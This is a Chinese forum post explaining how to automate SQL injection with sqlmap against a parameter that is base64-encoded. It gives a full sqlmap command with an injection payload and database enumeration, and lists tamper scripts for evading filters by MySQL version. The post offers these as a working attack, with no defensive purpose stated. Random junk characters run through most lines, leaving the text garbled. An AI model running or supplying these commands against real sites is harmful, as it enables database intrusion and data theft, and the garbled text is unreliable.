WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?) F/ Y+ X4 g1 K0 [' n
9 o0 x9 I; [- y* n$ v! }sqlmap的tamper里有个base64encode.py' g8 J7 ?8 ^: ]- X1 z! }! e# w
8 J0 {- f0 @. t+ N- j P使用如下
' F& m. X, T+ V V! V& h5 x- _# ?6 G9 ~7 L; }6 E2 C
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
( F8 o& a. p8 G! K5 B8 T3 Q: b c/ h; a5 }: c* V' v' p
( G4 t; p5 a8 z
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
" l! Z+ N0 j, v5 g% ]- L3 l4 G
& v4 {* D9 e0 y& J" y' ]( O其中常用到的bypass脚本绕过SQLMAP主要两个脚本:$ I4 U4 c1 u& N$ `
& E ~% N) _* E$ x; o% \
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入$ c% p* [ ^7 X, l9 U
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
' X# ], J8 `! e% \首先确定目标数据库版本,然后选择相应的脚本。6 J4 s" |- Y6 U" s
-v 3 --batch --tamper "space2hash.py"
; A" W9 Y( h# Z) @4 v1 j8 ^2 c w5 f. U: W8 C" C/ K
还有其他一些插件:
' n# _6 }! e5 C0 p, g7 |' Bencodes编码 ——charencode.py o" y3 ~. y \. r
base64编码 —— base64encode.py
1 r: C8 s4 n, T# I# e3 n- \, |* V: E替换空格和关键字 —— halfversionedmorekeywords.py( ~+ b% y8 ~8 ?
|
$ |5 i9 U/ ?8 u5 Q' r
# ^! d7 G3 r* `$ d: E4 z u8 C7 z# V
2 ]; e5 K" d" g% \$ I
|
发表于 2013-11-23 15:50:45
收藏
支持
反对